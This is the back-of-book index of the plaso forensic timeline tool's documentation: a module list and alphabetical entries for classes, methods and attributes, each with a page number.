50plaso.analysis.viper, 51plaso.analysis.virustotal, 52plaso.analysis.windows_services, 53plaso.analyzers, 61plaso.analyzers.hashers, 58plaso.analyzers.hashers.entropy, 54plaso.analyzers.hashers.interface, 55plaso.analyzers.hashers.manager, 55plaso.analyzers.hashers.md5, 57plaso.analyzers.hashers.sha1, 57plaso.analyzers.hashers.sha256, 58plaso.analyzers.hashing_analyzer, 58plaso.analyzers.interface, 59plaso.analyzers.logger, 60plaso.analyzers.manager, 60plaso.analyzers.yara_analyzer, 61plaso.cli, 97plaso.cli.extraction_tool, 84plaso.cli.helpers, 84plaso.cli.helpers.analysis_plugins, 62plaso.cli.helpers.artifact_definitions,

62plaso.cli.helpers.artifact_filters, 63plaso.cli.helpers.data_location, 64plaso.cli.helpers.database_config, 64

plaso.cli.helpers.date_filters, 65plaso.cli.helpers.dynamic_output, 65plaso.cli.helpers.elastic_output, 66plaso.cli.helpers.event_filters, 67plaso.cli.helpers.extraction, 67plaso.cli.helpers.filter_file, 68plaso.cli.helpers.hashers, 68plaso.cli.helpers.interface, 69plaso.cli.helpers.language, 70plaso.cli.helpers.manager, 70plaso.cli.helpers.nsrlsvr_analysis, 71plaso.cli.helpers.output_modules, 72plaso.cli.helpers.parsers, 72plaso.cli.helpers.process_resources, 73plaso.cli.helpers.profiling, 74plaso.cli.helpers.server_config, 74plaso.cli.helpers.sessionize_analysis,

75plaso.cli.helpers.status_view, 75plaso.cli.helpers.storage_file, 76plaso.cli.helpers.storage_format, 77plaso.cli.helpers.tagging_analysis, 77plaso.cli.helpers.temporary_directory,

78plaso.cli.helpers.text_prepend, 78plaso.cli.helpers.timesketch_output, 79plaso.cli.helpers.vfs_backend, 80plaso.cli.helpers.viper_analysis, 80plaso.cli.helpers.virustotal_analysis,

81plaso.cli.helpers.windows_services_analysis,

81plaso.cli.helpers.workers, 82plaso.cli.helpers.xlsx_output, 83plaso.cli.helpers.yara_rules, 83plaso.cli.image_export_tool, 85plaso.cli.log2timeline_tool, 86plaso.cli.logger, 87plaso.cli.pinfo_tool, 87plaso.cli.psort_tool, 88plaso.cli.psteal_tool, 89plaso.cli.status_view, 90

495


plaso.cli.storage_media_tool, 91plaso.cli.time_slices, 92plaso.cli.tool_options, 92plaso.cli.tools, 93plaso.cli.views, 96plaso.containers, 120plaso.containers.analyzer_result, 97plaso.containers.artifacts, 98plaso.containers.event_sources, 102plaso.containers.events, 102plaso.containers.interface, 106plaso.containers.manager, 107plaso.containers.plist_event, 108plaso.containers.reports, 109plaso.containers.sessions, 110plaso.containers.shell_item_events, 114plaso.containers.storage_media, 115plaso.containers.tasks, 115plaso.containers.time_events, 118plaso.containers.warnings, 118plaso.containers.windows_events, 119plaso.dependencies, 491plaso.engine, 152plaso.engine.artifact_filters, 120plaso.engine.configurations, 121plaso.engine.engine, 124plaso.engine.extractors, 126plaso.engine.filter_file, 127plaso.engine.filters_helper, 128plaso.engine.knowledge_base, 128plaso.engine.logger, 132plaso.engine.path_filters, 132plaso.engine.path_helper, 133plaso.engine.plaso_queue, 134plaso.engine.process_info, 135plaso.engine.processing_status, 135plaso.engine.profilers, 142plaso.engine.single_process, 144plaso.engine.tagging_file, 145plaso.engine.worker, 145plaso.engine.yaml_filter_file, 146plaso.engine.zeromq_queue, 146plaso.filters, 166plaso.filters.event_filter, 152plaso.filters.expression_parser, 153plaso.filters.expressions, 154plaso.filters.file_entry, 156plaso.filters.filters, 159plaso.filters.interface, 162plaso.filters.parser_filter, 163plaso.filters.path_filter, 164plaso.formatters, 183plaso.formatters.asl, 166plaso.formatters.chrome, 167

plaso.formatters.chrome_preferences, 167plaso.formatters.default, 168plaso.formatters.file_system, 168plaso.formatters.firefox, 169plaso.formatters.gdrive, 170plaso.formatters.interface, 170plaso.formatters.logger, 173plaso.formatters.manager, 173plaso.formatters.mediator, 175plaso.formatters.msiecf, 175plaso.formatters.olecf, 176plaso.formatters.safari_cookies, 177plaso.formatters.shell_items, 177plaso.formatters.tango_android, 178plaso.formatters.winevt, 178plaso.formatters.winevt_rc, 179plaso.formatters.winevtx, 181plaso.formatters.winlnk, 181plaso.formatters.winprefetch, 182plaso.formatters.winreg, 182plaso.formatters.yaml_formatters_file,

183plaso.lib, 191plaso.lib.bufferlib, 183plaso.lib.decorators, 184plaso.lib.definitions, 184plaso.lib.errors, 184plaso.lib.line_reader_file, 187plaso.lib.loggers, 188plaso.lib.plist, 188plaso.lib.specification, 189plaso.lib.timelib, 190plaso.multi_processing, 199plaso.multi_processing.analysis_process,

191plaso.multi_processing.base_process, 191plaso.multi_processing.engine, 192plaso.multi_processing.logger, 192plaso.multi_processing.plaso_xmlrpc, 192plaso.multi_processing.psort, 193plaso.multi_processing.rpc, 195plaso.multi_processing.task_engine, 195plaso.multi_processing.task_manager, 196plaso.multi_processing.worker_process,

199plaso.output, 215plaso.output.dynamic, 199plaso.output.elastic, 199plaso.output.formatting_helper, 200plaso.output.interface, 201plaso.output.json_line, 202plaso.output.json_out, 203plaso.output.kml, 203plaso.output.l2t_csv, 204

496 Python Module Index


plaso.output.logger, 205plaso.output.manager, 205plaso.output.mediator, 207plaso.output.null, 209plaso.output.rawpy, 209plaso.output.shared_dsv, 210plaso.output.shared_elastic, 211plaso.output.shared_json, 212plaso.output.timesketch_out, 213plaso.output.tln, 213plaso.output.xlsx, 214plaso.parsers, 437plaso.parsers.amcache, 326plaso.parsers.android_app_usage, 329plaso.parsers.apache_access, 329plaso.parsers.apt_history, 331plaso.parsers.asl, 332plaso.parsers.bash_history, 334plaso.parsers.bencode_parser, 335plaso.parsers.bencode_plugins, 218plaso.parsers.bencode_plugins.interface,

215plaso.parsers.bencode_plugins.transmission,

216plaso.parsers.bencode_plugins.utorrent,

217plaso.parsers.bsm, 335plaso.parsers.chrome_cache, 336plaso.parsers.chrome_preferences, 339plaso.parsers.cookie_plugins, 222plaso.parsers.cookie_plugins.ganalytics,

218plaso.parsers.cookie_plugins.interface,

220plaso.parsers.cookie_plugins.manager,

221plaso.parsers.cups_ipp, 340plaso.parsers.custom_destinations, 341plaso.parsers.czip, 342plaso.parsers.czip_plugins, 225plaso.parsers.czip_plugins.interface,

222plaso.parsers.czip_plugins.oxml, 223plaso.parsers.docker, 342plaso.parsers.dpkg, 344plaso.parsers.dsv_parser, 345plaso.parsers.dtfabric_parser, 346plaso.parsers.esedb, 347plaso.parsers.esedb_plugins, 234plaso.parsers.esedb_plugins.file_history,

225plaso.parsers.esedb_plugins.interface,

226

plaso.parsers.esedb_plugins.msie_webcache,227

plaso.parsers.esedb_plugins.srum, 230plaso.parsers.filestat, 348plaso.parsers.firefox_cache, 349plaso.parsers.fseventsd, 350plaso.parsers.gdrive_synclog, 351plaso.parsers.google_logging, 352plaso.parsers.iis, 354plaso.parsers.interface, 355plaso.parsers.java_idx, 357plaso.parsers.logger, 358plaso.parsers.mac_appfirewall, 358plaso.parsers.mac_keychain, 359plaso.parsers.mac_securityd, 362plaso.parsers.mac_wifi, 363plaso.parsers.mactime, 364plaso.parsers.manager, 366plaso.parsers.mcafeeav, 368plaso.parsers.mediator, 369plaso.parsers.msiecf, 374plaso.parsers.networkminer, 376plaso.parsers.ntfs, 377plaso.parsers.olecf, 380plaso.parsers.olecf_plugins, 238plaso.parsers.olecf_plugins.automatic_destinations,

234plaso.parsers.olecf_plugins.default, 235plaso.parsers.olecf_plugins.dtfabric_plugin,

236plaso.parsers.olecf_plugins.interface,

237plaso.parsers.olecf_plugins.summary, 237plaso.parsers.opera, 380plaso.parsers.pe, 382plaso.parsers.plist, 383plaso.parsers.plist_plugins, 249plaso.parsers.plist_plugins.airport, 238plaso.parsers.plist_plugins.appleaccount,

239plaso.parsers.plist_plugins.bluetooth,

239plaso.parsers.plist_plugins.default, 240plaso.parsers.plist_plugins.dtfabric_plugin,

240plaso.parsers.plist_plugins.install_history,

242plaso.parsers.plist_plugins.interface,

242plaso.parsers.plist_plugins.ipod, 244plaso.parsers.plist_plugins.launchd, 245plaso.parsers.plist_plugins.macuser, 246plaso.parsers.plist_plugins.safari, 246



plaso.parsers.plist_plugins.softwareupdate,247

plaso.parsers.plist_plugins.spotlight,248

plaso.parsers.plist_plugins.spotlight_volume,248

plaso.parsers.plist_plugins.timemachine,249

plaso.parsers.pls_recall, 383plaso.parsers.plugins, 384plaso.parsers.popcontest, 386plaso.parsers.presets, 388plaso.parsers.recycler, 390plaso.parsers.safari_cookies, 391plaso.parsers.santa, 392plaso.parsers.sccm, 396plaso.parsers.selinux, 397plaso.parsers.setupapi, 398plaso.parsers.shared, 250plaso.parsers.shared.shell_items, 249plaso.parsers.skydrivelog, 399plaso.parsers.sophos_av, 401plaso.parsers.spotlight_storedb, 402plaso.parsers.sqlite, 404plaso.parsers.sqlite_plugins, 293plaso.parsers.sqlite_plugins.android_calls,

250plaso.parsers.sqlite_plugins.android_sms,

251plaso.parsers.sqlite_plugins.android_webview,

252plaso.parsers.sqlite_plugins.android_webviewcache,

253plaso.parsers.sqlite_plugins.appusage,

254plaso.parsers.sqlite_plugins.chrome_autofill,

255plaso.parsers.sqlite_plugins.chrome_cookies,

256plaso.parsers.sqlite_plugins.chrome_extension_activity,

257plaso.parsers.sqlite_plugins.chrome_history,

258plaso.parsers.sqlite_plugins.firefox_cookies,

261plaso.parsers.sqlite_plugins.firefox_downloads,

262plaso.parsers.sqlite_plugins.firefox_history,

263plaso.parsers.sqlite_plugins.gdrive, 266plaso.parsers.sqlite_plugins.hangouts_messages,

268plaso.parsers.sqlite_plugins.imessage,

269

plaso.parsers.sqlite_plugins.interface,270

plaso.parsers.sqlite_plugins.kik_ios,271

plaso.parsers.sqlite_plugins.kodi, 272plaso.parsers.sqlite_plugins.ls_quarantine,

272plaso.parsers.sqlite_plugins.mac_document_versions,

273plaso.parsers.sqlite_plugins.mac_knowledgec,

274plaso.parsers.sqlite_plugins.mac_notes,

275plaso.parsers.sqlite_plugins.mac_notificationcenter,

276plaso.parsers.sqlite_plugins.mackeeper_cache,

277plaso.parsers.sqlite_plugins.macos_tcc,

279plaso.parsers.sqlite_plugins.safari, 280plaso.parsers.sqlite_plugins.skype, 281plaso.parsers.sqlite_plugins.tango_android,

284plaso.parsers.sqlite_plugins.twitter_android,

286plaso.parsers.sqlite_plugins.twitter_ios,

289plaso.parsers.sqlite_plugins.windows_timeline,

291plaso.parsers.sqlite_plugins.zeitgeist,

292plaso.parsers.symantec, 406plaso.parsers.syslog, 411plaso.parsers.syslog_plugins, 296plaso.parsers.syslog_plugins.cron, 293plaso.parsers.syslog_plugins.interface,

294plaso.parsers.syslog_plugins.ssh, 295plaso.parsers.systemd_journal, 413plaso.parsers.text_parser, 414plaso.parsers.trendmicroav, 417plaso.parsers.utmp, 420plaso.parsers.utmpx, 421plaso.parsers.vsftpd, 422plaso.parsers.winevt, 423plaso.parsers.winevtx, 424plaso.parsers.winfirewall, 426plaso.parsers.winjob, 428plaso.parsers.winlnk, 429plaso.parsers.winprefetch, 431plaso.parsers.winreg, 432plaso.parsers.winreg_plugins, 326plaso.parsers.winreg_plugins.appcompatcache,

296



plaso.parsers.winreg_plugins.bagmru, 297plaso.parsers.winreg_plugins.bam, 298plaso.parsers.winreg_plugins.ccleaner,

299plaso.parsers.winreg_plugins.default,

300plaso.parsers.winreg_plugins.dtfabric_plugin,

300plaso.parsers.winreg_plugins.interface,

301plaso.parsers.winreg_plugins.lfu, 303plaso.parsers.winreg_plugins.mountpoints,

304plaso.parsers.winreg_plugins.mrulist,

305plaso.parsers.winreg_plugins.mrulistex,

307plaso.parsers.winreg_plugins.msie_zones,

309plaso.parsers.winreg_plugins.network_drives,

309plaso.parsers.winreg_plugins.networks,

310plaso.parsers.winreg_plugins.officemru,

311plaso.parsers.winreg_plugins.outlook,

312plaso.parsers.winreg_plugins.programscache,

313plaso.parsers.winreg_plugins.run, 314plaso.parsers.winreg_plugins.sam_users,

314plaso.parsers.winreg_plugins.services,

315plaso.parsers.winreg_plugins.shutdown,

316plaso.parsers.winreg_plugins.task_scheduler,

317plaso.parsers.winreg_plugins.terminal_server,

318plaso.parsers.winreg_plugins.timezone,

319plaso.parsers.winreg_plugins.typedurls,

320plaso.parsers.winreg_plugins.usb, 320plaso.parsers.winreg_plugins.usbstor,

321plaso.parsers.winreg_plugins.userassist,

323plaso.parsers.winreg_plugins.windows_version,

324plaso.parsers.winreg_plugins.winlogon,

325plaso.parsers.winreg_plugins.winrar, 326

plaso.parsers.winrestore, 432plaso.parsers.xchatlog, 433plaso.parsers.xchatscrollback, 435plaso.parsers.zsh_extended_history, 436plaso.preprocessors, 444plaso.preprocessors.interface, 437plaso.preprocessors.linux, 439plaso.preprocessors.logger, 440plaso.preprocessors.macos, 440plaso.preprocessors.manager, 440plaso.preprocessors.windows, 442plaso.serializer, 445plaso.serializer.interface, 444plaso.serializer.json_serializer, 445plaso.serializer.logger, 445plaso.storage, 490plaso.storage.event_heaps, 466plaso.storage.event_tag_index, 467plaso.storage.factory, 468plaso.storage.fake, 452plaso.storage.fake.writer, 446plaso.storage.file_interface, 469plaso.storage.identifiers, 478plaso.storage.interface, 479plaso.storage.logger, 490plaso.storage.redis, 462plaso.storage.redis.merge_reader, 452plaso.storage.redis.reader, 452plaso.storage.redis.redis_store, 455plaso.storage.redis.writer, 457plaso.storage.sqlite, 466plaso.storage.sqlite.merge_reader, 462plaso.storage.sqlite.reader, 462plaso.storage.sqlite.sqlite_file, 462plaso.storage.sqlite.writer, 465plaso.storage.time_range, 490plaso.unix, 490plaso.winnt, 491plaso.winnt.known_folder_ids, 490plaso.winnt.language_ids, 491plaso.winnt.shell_folder_ids, 491plaso.winnt.time_zones, 491




INDEX

Symbols__enter__() (plaso.lib.line_reader_file.BinaryLineReader

method), 187__enter__() (plaso.storage.interface.StorageReader

method), 486__exit__() (plaso.lib.line_reader_file.BinaryLineReader

method), 187__exit__() (plaso.storage.interface.StorageReader

method), 486__iter__() (plaso.lib.bufferlib.CircularBuffer

method), 184__iter__() (plaso.lib.line_reader_file.BinaryDSVReader

method), 187__iter__() (plaso.lib.line_reader_file.BinaryLineReader

method), 187__len__() (plaso.lib.bufferlib.CircularBuffer method),

184__lt__() (plaso.containers.event_sources.EventSource

method), 102__lt__() (plaso.containers.events.EventObject

method), 104__lt__() (plaso.containers.tasks.Task method), 116__repr__() (plaso.filters.expressions.BinaryExpression

method), 155__repr__() (plaso.filters.expressions.EventExpression

method), 155

Aabort() (plaso.analysis.mediator.AnalysisMediator

property), 47abort() (plaso.parsers.mediator.ParserMediator prop-

erty), 373aborted (plaso.containers.sessions.Session attribute),

110aborted (plaso.containers.sessions.SessionCompletion

attribute), 112aborted (plaso.containers.tasks.Task attribute), 115aborted (plaso.containers.tasks.TaskCompletion at-

tribute), 117aborted (plaso.engine.processing_status.ProcessingStatus

attribute), 139

access (plaso.parsers.symantec.SymantecEventDataattribute), 406

access_count (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataattribute), 227

account_name (plaso.parsers.mac_keychain.KeychainApplicationRecordEventDataattribute), 359

account_name (plaso.parsers.mac_keychain.KeychainInternetRecordEventDataattribute), 360

account_rid (plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryEventDataattribute), 314

action (plaso.parsers.docker.DockerJSONContainerEventDataattribute), 342

action (plaso.parsers.mac_appfirewall.MacAppFirewallLogEventDataattribute), 358

action (plaso.parsers.mac_wifi.MacWifiLogEventDataattribute), 363

action (plaso.parsers.mcafeeav.McafeeAVEventDataattribute), 368

action (plaso.parsers.santa.SantaExecutionEventDataattribute), 392

action (plaso.parsers.santa.SantaFileSystemEventDataattribute), 393

action (plaso.parsers.santa.SantaMountEventData at-tribute), 394

action (plaso.parsers.trendmicroav.TrendMicroAVEventDataattribute), 418

action (plaso.parsers.winfirewall.WinFirewallEventDataattribute), 426

action0 (plaso.parsers.symantec.SymantecEventDataattribute), 406


action1_status (plaso.parsers.symantec.SymantecEventDataattribute), 406


action2_status (plaso.parsers.symantec.SymantecEventDataattribute), 406

action_type (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataattribute), 257

action_type (plaso.parsers.sqlite_plugins.skype.SkypeTransferFileEventDataattribute), 283

501


actions (plaso.filters.expression_parser.Token at-tribute), 154

active_duration_seconds(plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineUserEngagedEventDataattribute), 292

activity_id (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataattribute), 257

AddAnalysisReport()(plaso.storage.fake.writer.FakeStorageWritermethod), 446

AddAnalysisReport()(plaso.storage.file_interface.StorageFileWritermethod), 472

AddAnalysisReport()(plaso.storage.interface.BaseStore method),480

AddAnalysisReport()(plaso.storage.interface.StorageWritermethod), 487

AddAnalysisReport()(plaso.storage.redis.writer.RedisStorageWritermethod), 457

AddArg() (plaso.filters.expressions.Expressionmethod), 155

AddArguments() (plaso.cli.helpers.analysis_plugins.AnalysisPluginsArgumentsHelperclass method), 62

AddArguments() (plaso.cli.helpers.artifact_definitions.ArtifactDefinitionsArgumentsHelperclass method), 62

AddArguments() (plaso.cli.helpers.artifact_filters.ArtifactFiltersArgumentsHelperclass method), 63

AddArguments() (plaso.cli.helpers.data_location.DataLocationArgumentsHelperclass method), 64

AddArguments() (plaso.cli.helpers.database_config.DatabaseArgumentsHelperclass method), 64

AddArguments() (plaso.cli.helpers.date_filters.DateFiltersArgumentsHelperclass method), 65

AddArguments() (plaso.cli.helpers.dynamic_output.DynamicOutputArgumentsHelperclass method), 65

AddArguments() (plaso.cli.helpers.elastic_output.ElasticSearchOutputArgumentsHelperclass method), 66

AddArguments() (plaso.cli.helpers.event_filters.EventFiltersArgumentsHelperclass method), 67

AddArguments() (plaso.cli.helpers.extraction.ExtractionArgumentsHelperclass method), 67

AddArguments() (plaso.cli.helpers.filter_file.FilterFileArgumentsHelperclass method), 68

AddArguments() (plaso.cli.helpers.hashers.HashersArgumentsHelperclass method), 68

AddArguments() (plaso.cli.helpers.interface.ArgumentsHelperclass method), 69

AddArguments() (plaso.cli.helpers.language.LanguageArgumentsHelperclass method), 70

AddArguments() (plaso.cli.helpers.nsrlsvr_analysis.NsrlsvrAnalysisArgumentsHelperclass method), 71

AddArguments() (plaso.cli.helpers.output_modules.OutputModulesArgumentsHelperclass method), 72

AddArguments() (plaso.cli.helpers.parsers.ParsersArgumentsHelperclass method), 72

AddArguments() (plaso.cli.helpers.process_resources.ProcessResourcesArgumentsHelperclass method), 73

AddArguments() (plaso.cli.helpers.profiling.ProfilingArgumentsHelperclass method), 74

AddArguments() (plaso.cli.helpers.server_config.ServerArgumentsHelperclass method), 74

AddArguments() (plaso.cli.helpers.sessionize_analysis.SessionizeAnalysisArgumentsHelperclass method), 75

AddArguments() (plaso.cli.helpers.status_view.StatusViewArgumentsHelperclass method), 75

AddArguments() (plaso.cli.helpers.storage_file.StorageFileArgumentsHelperclass method), 76

AddArguments() (plaso.cli.helpers.storage_format.StorageFormatArgumentsHelperclass method), 77

AddArguments() (plaso.cli.helpers.tagging_analysis.TaggingAnalysisArgumentsHelperclass method), 77

AddArguments() (plaso.cli.helpers.temporary_directory.TemporaryDirectoryArgumentsHelperclass method), 78

AddArguments() (plaso.cli.helpers.text_prepend.TextPrependArgumentsHelperclass method), 78

AddArguments() (plaso.cli.helpers.timesketch_output.TimesketchOutputArgumentsHelperclass method), 79

AddArguments() (plaso.cli.helpers.vfs_backend.VFSBackEndArgumentsHelperclass method), 80

AddArguments() (plaso.cli.helpers.viper_analysis.ViperAnalysisArgumentsHelperclass method), 80

AddArguments() (plaso.cli.helpers.virustotal_analysis.VirusTotalAnalysisArgumentsHelperclass method), 81

AddArguments() (plaso.cli.helpers.windows_services_analysis.WindowsServicesAnalysisArgumentsHelperclass method), 81

AddArguments() (plaso.cli.helpers.workers.WorkersArgumentsHelperclass method), 82

AddArguments() (plaso.cli.helpers.xlsx_output.XLSXOutputArgumentsHelperclass method), 83

AddArguments() (plaso.cli.helpers.yara_rules.YaraRulesArgumentsHelperclass method), 83

AddAvailableTimeZone()(plaso.engine.knowledge_base.KnowledgeBasemethod), 128

AddBasicOptions() (plaso.cli.tools.CLIToolmethod), 94

AddCommandLineArguments()(plaso.cli.helpers.manager.ArgumentHelperManagerclass method), 70

AddCredentialOptions()(plaso.cli.storage_media_tool.StorageMediaToolmethod), 91

AddDateTimeRange()(plaso.filters.file_entry.DateTimeFileEntryFiltermethod), 156

502 Index


AddEnvironmentVariable()(plaso.engine.knowledge_base.KnowledgeBasemethod), 128

AddEvent() (plaso.storage.fake.writer.FakeStorageWritermethod), 446

AddEvent() (plaso.storage.file_interface.StorageFileWritermethod), 472

AddEvent() (plaso.storage.interface.BaseStoremethod), 480

AddEvent() (plaso.storage.interface.StorageWritermethod), 487

AddEvent() (plaso.storage.redis.redis_store.RedisStoremethod), 455

AddEvent() (plaso.storage.redis.writer.RedisStorageWritermethod), 457

AddEvent() (plaso.storage.sqlite.sqlite_file.SQLiteStorageFilemethod), 463

AddEventAttribute()(plaso.parsers.mediator.ParserMediatormethod), 370

AddEventData() (plaso.storage.fake.writer.FakeStorageWritermethod), 447

AddEventData() (plaso.storage.file_interface.StorageFileWritermethod), 473

AddEventData() (plaso.storage.interface.BaseStoremethod), 480

AddEventData() (plaso.storage.interface.StorageWritermethod), 487

AddEventData() (plaso.storage.redis.writer.RedisStorageWritermethod), 457

AddEventData() (plaso.storage.sqlite.sqlite_file.SQLiteStorageFilemethod), 463

AddEventDataStream()(plaso.storage.fake.writer.FakeStorageWritermethod), 447

AddEventDataStream()(plaso.storage.file_interface.StorageFileWritermethod), 473

AddEventDataStream()(plaso.storage.interface.BaseStore method),480

AddEventDataStream()(plaso.storage.interface.StorageWritermethod), 487

AddEventDataStream()(plaso.storage.redis.writer.RedisStorageWritermethod), 457

AddEventSource() (plaso.storage.fake.writer.FakeStorageWritermethod), 447

AddEventSource() (plaso.storage.file_interface.StorageFileWritermethod), 473

AddEventSource() (plaso.storage.interface.BaseStoremethod), 480

AddEventSource() (plaso.storage.interface.StorageWriter

method), 487AddEventSource() (plaso.storage.redis.writer.RedisStorageWriter

method), 458AddEventTag() (plaso.storage.fake.writer.FakeStorageWriter

method), 447AddEventTag() (plaso.storage.file_interface.StorageFileWriter

method), 473AddEventTag() (plaso.storage.interface.BaseStore

method), 480AddEventTag() (plaso.storage.interface.StorageWriter

method), 488AddEventTag() (plaso.storage.redis.writer.RedisStorageWriter

method), 458AddEventTag() (plaso.storage.sqlite.sqlite_file.SQLiteStorageFile

method), 463AddFilter() (plaso.filters.file_entry.FileEntryFilterCollection

method), 157AddFilterOptions()

(plaso.cli.image_export_tool.ImageExportToolmethod), 85

AddHelper() (plaso.formatters.interface.EventFormattermethod), 172

AddInformationalOptions()(plaso.cli.tools.CLITool method), 94

AddLabel() (plaso.containers.events.EventTagmethod), 105

AddLabels() (plaso.containers.events.EventTagmethod), 105

AddLogFileOptions() (plaso.cli.tools.CLIToolmethod), 94

AddNewSignature()(plaso.lib.specification.FormatSpecificationmethod), 189

AddNewSpecification()(plaso.lib.specification.FormatSpecificationStoremethod), 189

AddOperands() (plaso.filters.expressions.BinaryExpressionmethod), 154

AddOutputTimeZoneOption()(plaso.cli.psort_tool.PsortTool method),88

AddOutputTimeZoneOption()(plaso.cli.psteal_tool.PstealTool method),89

AddPathSegment() (plaso.filters.path_filter.PathFilterScanTreeNodemethod), 165

AddPerformanceOptions()(plaso.cli.extraction_tool.ExtractionToolmethod), 84

AddProcessingOptions()(plaso.cli.extraction_tool.ExtractionToolmethod), 84

AddProcessingOptions()(plaso.cli.psort_tool.PsortTool method),

Index 503


88address (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventData

attribute), 251address (plaso.parsers.symantec.SymantecEventData

attribute), 406address (plaso.parsers.syslog_plugins.ssh.SSHEventData

attribute), 295AddRow() (plaso.cli.views.BaseTableView method), 96AddRow() (plaso.cli.views.CLITableView method), 96AddRow() (plaso.cli.views.CLITabularTableView

method), 96AddService() (plaso.analysis.windows_services.WindowsServiceCollection

method), 53AddSpecification()

(plaso.lib.specification.FormatSpecificationStoremethod), 189

AddStorageMediaImageOptions()(plaso.cli.storage_media_tool.StorageMediaToolmethod), 91

AddTimeZoneOption()(plaso.cli.extraction_tool.ExtractionToolmethod), 84

AddUserAccount() (plaso.engine.knowledge_base.KnowledgeBasemethod), 128

AddVSSProcessingOptions()(plaso.cli.storage_media_tool.StorageMediaToolmethod), 91

AddWarning() (plaso.storage.fake.writer.FakeStorageWritermethod), 447

AddWarning() (plaso.storage.file_interface.StorageFileWritermethod), 473

AddWarning() (plaso.storage.interface.BaseStoremethod), 480

AddWarning() (plaso.storage.interface.StorageWritermethod), 488

AddWarning() (plaso.storage.redis.writer.RedisStorageWritermethod), 458

agent (plaso.parsers.mac_appfirewall.MacAppFirewallLogEventDataattribute), 358

agent (plaso.parsers.mac_wifi.MacWifiLogEventDataattribute), 363

AirportPlugin (class inplaso.parsers.plist_plugins.airport), 238

allowed (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntryattribute), 279

AMCacheFileEventData (class inplaso.parsers.amcache), 326

AMCacheParser (class in plaso.parsers.amcache), 327AMCacheProgramEventData (class in

plaso.parsers.amcache), 327analyses_performed

(plaso.analysis.hash_tagging.HashAnalyzerattribute), 42

analyses_performed

(plaso.analysis.nsrlsvr.NsrlsvrAnalyzer at-tribute), 48

analysis_reports (plaso.storage.fake.writer.FakeStorageWriterattribute), 446

analysis_reports_counter(plaso.containers.sessions.Session attribute),110

analysis_reports_counter(plaso.containers.sessions.SessionCompletionattribute), 112

AnalysisMediator (class inplaso.analysis.mediator), 46

AnalysisPlugin (class in plaso.analysis.interface),44

AnalysisPluginManager (class inplaso.analysis.manager), 45

AnalysisPluginOptions (class inplaso.cli.tool_options), 92

AnalysisPluginsArgumentsHelper (class inplaso.cli.helpers.analysis_plugins), 62

AnalysisProcess (class inplaso.multi_processing.analysis_process),191

AnalysisReport (class in plaso.containers.reports),109

Analyze() (plaso.analysis.hash_tagging.HashAnalyzermethod), 42

Analyze() (plaso.analysis.hash_tagging.HTTPHashAnalyzermethod), 41

Analyze() (plaso.analysis.nsrlsvr.NsrlsvrAnalyzermethod), 48

Analyze() (plaso.analysis.viper.ViperAnalyzermethod), 51

Analyze() (plaso.analysis.virustotal.VirusTotalAnalyzermethod), 53

Analyze() (plaso.analyzers.hashing_analyzer.HashingAnalyzermethod), 58

Analyze() (plaso.analyzers.interface.BaseAnalyzermethod), 59

Analyze() (plaso.analyzers.yara_analyzer.YaraAnalyzermethod), 61

AnalyzeEvents() (plaso.cli.psteal_tool.PstealToolmethod), 89

AnalyzeEvents() (plaso.multi_processing.psort.PsortMultiProcessEnginemethod), 194

analyzer_name (plaso.containers.analyzer_result.AnalyzerResultattribute), 97

AnalyzerResult (class inplaso.containers.analyzer_result), 97

AnalyzersManager (class inplaso.analyzers.manager), 60

AnalyzersProfiler (class inplaso.engine.profilers), 142

AndFilter (class in plaso.filters.filters), 159

504 Index


AndroidAppUsageEventData (class inplaso.parsers.android_app_usage), 329

AndroidAppUsageParser (class inplaso.parsers.android_app_usage), 329

AndroidCallEventData (class inplaso.parsers.sqlite_plugins.android_calls),250

AndroidCallPlugin (class inplaso.parsers.sqlite_plugins.android_calls),251

AndroidSMSEventData (class inplaso.parsers.sqlite_plugins.android_sms),251

AndroidSMSPlugin (class inplaso.parsers.sqlite_plugins.android_sms),251

AndroidWebViewCacheEventData (class inplaso.parsers.sqlite_plugins.android_webviewcache),253

AndroidWebViewCachePlugin (class inplaso.parsers.sqlite_plugins.android_webviewcache),253

ApacheAccessEventData (class inplaso.parsers.apache_access), 329

ApacheAccessParser (class inplaso.parsers.apache_access), 330

api_name (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataattribute), 257

app_version (plaso.parsers.czip_plugins.oxml.OpenXMLEventDataattribute), 223

app_version (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventDataattribute), 254

AppCompatCacheCachedEntry (class inplaso.parsers.winreg_plugins.appcompatcache),296

AppCompatCacheEventData (class inplaso.parsers.winreg_plugins.appcompatcache),296

AppCompatCacheHeader (class inplaso.parsers.winreg_plugins.appcompatcache),297

AppCompatCacheWindowsRegistryPlugin(class in plaso.parsers.winreg_plugins.appcompatcache),297

appearance (plaso.parsers.santa.SantaMountEventDataattribute), 395

Append() (plaso.lib.bufferlib.CircularBuffer method),183

AppendToParserChain()(plaso.parsers.mediator.ParserMediatormethod), 370

AppleAccountPlugin (class inplaso.parsers.plist_plugins.appleaccount),239

application (plaso.parsers.cups_ipp.CupsIppEventDataattribute), 340

application (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230

application (plaso.parsers.esedb_plugins.srum.SRUMNetworkConnectivityUsageEventDataattribute), 231

application (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventDataattribute), 232

application (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventDataattribute), 254

application (plaso.parsers.winjob.WinJobEventDataattribute), 428

application (plaso.parsers.winreg_plugins.winlogon.WinlogonEventDataattribute), 325

application_display_name(plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineGenericEventDataattribute), 291

application_focus_count(plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventDataattribute), 323

application_focus_duration(plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventDataattribute), 323

application_name (plaso.parsers.trendmicroav.TrendMicroUrlEventDataattribute), 419

ApplicationUsagePlugin (class inplaso.parsers.sqlite_plugins.appusage), 254

APTHistoryLogEventData (class inplaso.parsers.apt_history), 331

